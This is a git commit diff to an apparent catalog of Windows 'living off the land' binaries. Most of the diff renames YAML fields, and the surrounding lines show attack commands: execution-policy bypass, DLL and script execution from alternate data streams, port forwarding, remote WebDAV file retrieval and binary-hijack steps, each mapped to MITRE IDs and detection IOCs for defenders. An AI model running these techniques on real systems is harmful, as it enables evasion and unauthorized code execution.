Major changes to Web portal - Small fixes to source files to adjust

This commit is contained in:
Oddvar Moe 2018-12-10 14:28:12 +01:00
parent 2b77add5b4
commit 94368c1e69
113 changed files with 233 additions and 232 deletions

View File

@ -7,7 +7,7 @@ Commands:
- Command: The command
Description: Description of the command
Usecase: A description of the usecase
Category: Execution
Category: Execute
Privileges: Required privs
MitreID: T1055
MitreLink: https://attack.mitre.org/wiki/Technique/T1055
@ -15,15 +15,15 @@ Commands:
- Command: The second command
Description: Description of the second command
Usecase: A description of the usecase
Category: AWL-Bypass
Category: AWL Bypass
Privileges: Required privs
MitreID: T1033
MitreLink: https://attack.mitre.org/wiki/Technique/T1033
OperatingSystem: Windows 10 All
Full Path:
Full_Path:
- Path: c:\windows\system32\bin.exe
- Path: c:\windows\syswow64\bin.exe
Code Sample:
Code_Sample:
- Code: http://url.com/git.txt
Detection:
- IOC: Event ID 10

View File

@ -7,10 +7,10 @@ Categories: []
Commands:
- Command: explorer.exe calc.exe
Description: 'Executes calc.exe as a subprocess of explorer.exe.'
Full Path:
Full_Path:
- c:\windows\explorer.exe
- c:\windows\sysWOW64\explorer.exe
Code Sample: []
Code_Sample: []
Detection: []
Resources:
- https://twitter.com/bohops/status/986984122563391488

View File

@ -13,10 +13,10 @@ Commands:
Description: Load (execute) NetSh.exe helper DLL file.
- Command: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
Description: Forward traffic from the listening address and proxy to a remote system.
Full Path:
Full_Path:
- C:\Windows\System32
- C:\Windows\SysWOW64
Code Sample: []
Code_Sample: []
Detection: []
Resources:
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md

View File

@ -7,9 +7,9 @@ Categories: []
Commands:
- Command: nltest.exe /SERVER:192.168.1.10 /QUERY
Description: ''
Full Path:
Full_Path:
- c:\windows\system32\nltest.exe
Code Sample: []
Code_Sample: []
Detection: []
Resources:
- https://twitter.com/sysopfb/status/986799053668139009

View File

@ -9,10 +9,10 @@ Commands:
Description: Opens the target file with the default application.
- Command: OpenWith.exe /c C:\testing.msi
Description: Opens the target file with the default application.
Full Path:
Full_Path:
- c:\windows\system32\Openwith.exe
- c:\windows\sysWOW64\Openwith.exe
Code Sample: []
Code_Sample: []
Detection: []
Resources:
- https://twitter.com/harr0ey/status/991670870384021504

View File

@ -7,10 +7,10 @@ Categories: []
Commands:
- Command: powershell -ep bypass - < c:\temp:ttt
Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
Full Path:
Full_Path:
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Code Sample: []
Code_Sample: []
Detection: []
Resources:
- https://twitter.com/Moriarty_Meng/status/984380793383370752

View File

@ -11,10 +11,10 @@ Commands:
Description: Capture a maximum of 100 screenshots of the desktop and save them in the target .ZIP file.
- Command: psr.exe /stop
Description: Stop the Problem Step Recorder.
Full Path:
Full_Path:
- C:\Windows\System32\Psr.exe
- C:\Windows\SysWOW64\Psr.exe
Code Sample: []
Code_Sample: []
Detection: []
Resources:
- https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf

View File

@ -9,10 +9,10 @@ Commands:
Description: Copy the entire contents of the SourceFolder to the DestFolder.
- Command: Robocopy.exe \\SERVER\SourceFolder C:\DestFolder
Description: Copy the entire contents of the SourceFolder to the DestFolder.
Full Path:
Full_Path:
- c:\windows\system32\binary.exe
- c:\windows\sysWOW64\binary.exe
Code Sample: []
Code_Sample: []
Detection: []
Resources:
- https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx

View File

@ -7,9 +7,9 @@ Categories: []
Commands:
- Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe
Full Path:
Full_Path:
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\
Code Sample: []
Code_Sample: []
Detection: []
Resources:
- https://twitter.com/pabraeken/status/997997818362155008

View File

@ -7,9 +7,9 @@ Categories: []
Commands:
- Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
Description: Execute another command through gpup.exe (Notepad++ binary).
Full Path:
Full_Path:
- 'C:\Program Files (x86)\Notepad++\updater\gpup.exe '
Code Sample: []
Code_Sample: []
Detection: []
Resources:
- https://twitter.com/pabraeken/status/997892519827558400

View File

@ -7,9 +7,9 @@ Categories: []
Commands:
- Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
Description: Run PowerShell via LotusNotes.
Full Path:
Full_Path:
- C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe
Code Sample: []
Code_Sample: []
Detection: []
Resources:
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f

View File

@ -7,9 +7,9 @@ Categories: []
Commands:
- Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
Description: Run PowerShell via LotusNotes.
Full Path:
Full_Path:
- C:\Program Files (x86)\IBM\Lotus\Notes\notes.exe
Code Sample: []
Code_Sample: []
Detection: []
Resources:
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f

View File

@ -17,9 +17,9 @@ Commands:
Description: Kill a process.
- Command: Nvudisp.exe Run foo
Description: Run process
Full Path:
Full_Path:
- C:\windows\system32\nvuDisp.exe
Code Sample: []
Code_Sample: []
Detection: []
Resources:
- http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html

View File

@ -17,9 +17,9 @@ Commands:
Description: Kill a process.
- Command: nvuhda6.exe Run foo
Description: Run process
Full Path:
Full_Path:
- Missing
Code Sample: []
Code_Sample: []
Detection: []
Resources:
- http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/

View File

@ -7,9 +7,9 @@ Categories: []
Commands:
- Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe
Full Path:
Full_Path:
- C:\Program Files (x86)\ROCCAT\ROCCAT Swarm\
Code Sample: []
Code_Sample: []
Detection: []
Resources:
- https://twitter.com/pabraeken/status/994213164484001793

View File

@ -7,9 +7,9 @@ Categories: []
Commands:
- Command: Run Setup.exe
Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
Full Path:
Full_Path:
- C:\LJ-Ent-700-color-MFP-M775-Full-Solution-15315
Code Sample: []
Code_Sample: []
Detection: []
Resources:
- https://twitter.com/pabraeken/status/994381620588236800

View File

@ -7,9 +7,9 @@ Categories: []
Commands:
- Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
Description: Execute calc.exe through DefaultInstall Section Directive in INF file.
Full Path:
Full_Path:
- C:\Program Files (x86)\Citrix\ICA Client\Drivers64\Usbinst.exe
Code Sample: []
Code_Sample: []
Detection: []
Resources:
- https://twitter.com/pabraeken/status/993514357807108096

View File

@ -7,9 +7,9 @@ Categories: []
Commands:
- Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe
Full Path:
Full_Path:
- C:\Program Files\Oracle\VirtualBox Guest Additions
Code Sample: []
Code_Sample: []
Detection: []
Resources:
- https://twitter.com/pabraeken/status/993497996179492864

View File

@ -12,9 +12,9 @@ Commands:
MitreID: T1218
MItreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
Full Path:
Full_Path:
- Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

View File

@ -18,9 +18,9 @@ Commands:
MitreID: T1064
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
OperatingSystem: Windows
Full Path:
Full_Path:
- c:\python27amd64\Lib\site-packages\win32com\test\testxslt.js (Visual Studio Installation)
Code Sample: []
Code_Sample: []
Detection: []
Resources:
- https://twitter.com/bohops/status/993314069116485632

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\Atbroker.exe
- Path: C:\Windows\SysWOW64\Atbroker.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration

View File

@ -20,10 +20,10 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\bash.exe
- Path: C:\Windows\SysWOW64\bash.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: Child process from bash.exe

View File

@ -36,10 +36,10 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\bitsadmin.exe
- Path: C:\Windows\SysWOW64\bitsadmin.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: Child process from bitsadmin.exe

View File

@ -36,10 +36,10 @@ Commands:
MitreID: T1140
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\certutil.exe
- Path: C:\Windows\SysWOW64\certutil.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: Certutil.exe creating new files on disk

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1078
MitreLink: https://attack.mitre.org/wiki/Technique/T1078
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\cmdkey.exe
- Path: C:\Windows\SysWOW64\cmdkey.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: Usage of this command could be an IOC

View File

@ -20,10 +20,10 @@ Commands:
MitreID: T1191
MitreLink: https://attack.mitre.org/wiki/Technique/T1191
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\cmstp.exe
- Path: C:\Windows\SysWOW64\cmstp.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: Execution of cmstp.exe should not be normal unless VPN is in use

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1196
MitreLink: https://attack.mitre.org/wiki/Technique/T1196
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\control.exe
- Path: C:\Windows\SysWOW64\control.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: Control.exe executing files from alternate data streams.

View File

@ -20,10 +20,10 @@ Commands:
MitreID: T1127
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: Csc.exe should normally not run a system unless it is used for development.

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\cscript.exe
- Path: C:\Windows\SysWOW64\cscript.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: Cscript.exe executing files from alternate data streams

View File

@ -12,12 +12,12 @@ Commands:
MitreID: T1127
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

View File

@ -20,10 +20,10 @@ Commands:
MitreID: T1003
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
OperatingSystem: Windows server
Full Path:
Full_Path:
- Path: C:\Windows\System32\diskshadow.exe
- Path: C:\Windows\SysWOW64\diskshadow.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: Child process from diskshadow.exe

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1035
MitreLink: https://attack.mitre.org/wiki/Technique/T1035
OperatingSystem: Windows server
Full Path:
Full_Path:
- Path: C:\Windows\System32\Dnscmd.exe
- Path: C:\Windows\SysWOW64\Dnscmd.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: Dnscmd.exe loading dll from UNC path

View File

@ -44,10 +44,10 @@ Commands:
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\esentutl.exe
- Path: C:\Windows\SysWOW64\esentutl.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

View File

@ -28,10 +28,10 @@ Commands:
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\Expand.exe
- Path: C:\Windows\SysWOW64\Expand.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Program Files\Internet Explorer\Extexport.exe
- Path: C:\Program Files\Internet Explorer(x86)\Extexport.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: Extexport.exe loads dll and is execute from other folder the original path

View File

@ -28,10 +28,10 @@ Commands:
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\extrac32.exe
- Path: C:\Windows\SysWOW64\extrac32.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

View File

@ -36,10 +36,10 @@ Commands:
MitreID: T1185
MitreLink: https://attack.mitre.org/wiki/Technique/T1185
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\findstr.exe
- Path: C:\Windows\SysWOW64\findstr.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: finstr.exe should normally not be invoked on a client system

View File

@ -20,10 +20,10 @@ Commands:
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\forfiles.exe
- Path: C:\Windows\SysWOW64\forfiles.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

View File

@ -20,10 +20,10 @@ Commands:
MitreID: T1216
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\gpscript.exe
- Path: C:\Windows\SysWOW64\gpscript.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: Scripts added in local group policy

View File

@ -20,10 +20,10 @@ Commands:
MitreID: T1216
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\hh.exe
- Path: C:\Windows\SysWOW64\hh.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: hh.exe should normally not be in use on a normal workstation

View File

@ -12,12 +12,12 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: c:\windows\system32\ie4unit.exe
- Path: c:\windows\sysWOW64\ie4unit.exe
- Path: c:\windows\system32\ieuinit.inf
- Path: c:\windows\sysWOW64\ieuinit.inf
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: ie4unit.exe loading a inf file from outside %windir%

View File

@ -20,10 +20,10 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\Infdefaultinstall.exe
- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
Code Sample:
Code_Sample:
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
Detection:
- IOC:

View File

@ -20,12 +20,12 @@ Commands:
MitreID: T1118
MitreLink: https://attack.mitre.org/wiki/Technique/T1118
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

View File

@ -15,7 +15,7 @@ Commands:
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
Usecase: Hide data compressed into an alternate data stream
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -28,10 +28,10 @@ Commands:
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\makecab.exe
- Path: C:\Windows\SysWOW64\makecab.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: Makecab getting files from Internet

View File

@ -20,10 +20,10 @@ Commands:
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\mavinject.exe
- Path: C:\Windows\SysWOW64\mavinject.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: mavinject.exe should not run unless APP-v is in use on the workstation

View File

@ -7,7 +7,7 @@ Commands:
- Command: Microsoft.Worflow.Compiler.exe tests.xml results.xml
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.
Usecase: Compile and run code
Category: Execution
Category: Execute
Privileges: User
MitreID: T1127
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
@ -28,9 +28,9 @@ Commands:
MitreID: T1127
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
OperatingSystem: Windows 10S
Full Path:
Full_Path:
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations.

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10 (and possibly earlier versions)
Full Path:
Full_Path:
- Path: C:\Windows\System32\mmc.exe
- Path: C:\Windows\SysWOW64\mmc.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

View File

@ -20,14 +20,14 @@ Commands:
MitreID: T1127
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
- Path: C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: Msbuild.exe should not normally be executed on workstations

View File

@ -12,9 +12,9 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\msconfig.exe
Code Sample:
Code_Sample:
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml
Detection:
- IOC: mscfgtlc.xml changes in system32 folder

View File

@ -20,10 +20,10 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\Msdt.exe
- Path: C:\Windows\SysWOW64\Msdt.exe
Code Sample:
Code_Sample:
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml
Detection:
- IOC:

View File

@ -36,10 +36,10 @@ Commands:
MitreID: T1170
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\mshta.exe
- Path: C:\Windows\SysWOW64\mshta.exe
Code Sample:
Code_Sample:
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct
Detection:
- IOC: mshta.exe executing raw or obfuscated script within the command-line

View File

@ -36,10 +36,10 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\msiexec.exe
- Path: C:\Windows\SysWOW64\msiexec.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: msiexec.exe getting files from Internet

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\odbcconf.exe
- Path: C:\Windows\SysWOW64\odbcconf.exe
Code Sample:
Code_Sample:
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp
Detection:
- IOC:

View File

@ -28,9 +28,9 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\pcalua.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

View File

@ -12,9 +12,9 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\pcwrun.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\Presentationhost.exe
- Path: C:\Windows\SysWOW64\Presentationhost.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

View File

@ -28,10 +28,10 @@ Commands:
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\print.exe
- Path: C:\Windows\SysWOW64\print.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: Print.exe getting files from internet

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\reg.exe
- Path: C:\Windows\SysWOW64\reg.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: reg.exe writing to an ADS

View File

@ -20,12 +20,12 @@ Commands:
MitreID: T1121
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: regasm.exe executing dll file

View File

@ -20,10 +20,10 @@ Commands:
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\regedit.exe
- Path: C:\Windows\SysWOW64\regedit.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: regedit.exe reading and writing to alternate data stream

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\Register-cimprovider.exe
- Path: C:\Windows\SysWOW64\Register-cimprovider.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

View File

@ -20,10 +20,10 @@ Commands:
MitreID: T1121
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\regsvcs.exe
- Path: C:\Windows\SysWOW64\regsvcs.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

View File

@ -36,10 +36,10 @@ Commands:
MitreID: T1117
MitreLink: https://attack.mitre.org/wiki/Technique/T1117
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\regsvr32.exe
- Path: C:\Windows\SysWOW64\regsvr32.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: regsvr32.exe getting files from Internet

View File

@ -20,10 +20,10 @@ Commands:
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\replace.exe
- Path: C:\Windows\SysWOW64\replace.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: Replace.exe getting files from remote server

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1003
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\rpcping.exe
- Path: C:\Windows\SysWOW64\rpcping.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

View File

@ -47,7 +47,7 @@ Commands:
- Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
Usecase: Execute code from alternate data stream
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -60,10 +60,10 @@ Commands:
MitreID:
MitreLink:
OperatingSystem: Windows 10 (and likely previous versions)
Full Path:
Full_Path:
- Path: C:\Windows\System32\rundll32.exe
- Path: C:\Windows\SysWOW64\rundll32.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

View File

@ -12,10 +12,10 @@ Commands:
